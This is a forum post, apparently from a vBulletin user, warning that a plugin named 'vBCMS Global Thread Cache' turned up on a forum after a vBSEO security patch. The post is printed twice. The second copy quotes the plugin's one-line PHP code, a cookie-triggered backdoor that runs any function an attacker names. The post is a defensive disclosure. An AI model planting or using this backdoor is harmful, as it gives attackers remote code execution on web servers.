Tweet
I received notice about security issue with vBSEO: http://www.vbseo.com/f5/vbseo-securi...release-52783/
And after patching it, I noticed this plugin:
vBCMS Global Thread Cache
Code in it is this:
This is reported in this post: http://www.vbseo.com/f5/vbseo-securi...tml#post325579
But, it seems that this plugin appeared to users who already had patched version of vBSEO, so it seems that this plugin was somehow inserted through different channels. I want to alarm you about this plugin and potential security problem. Please, investigate it further.
And after patching it, I noticed this plugin:
vBCMS Global Thread Cache
Code in it is this:
PHP Code:
/* vBCMS Global Thread Cache */
(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
But, it seems that this plugin appeared to users who already had patched version of vBSEO, so it seems that this plugin was somehow inserted through different channels. I want to alarm you about this plugin and potential security problem. Please, investigate it further.
Comment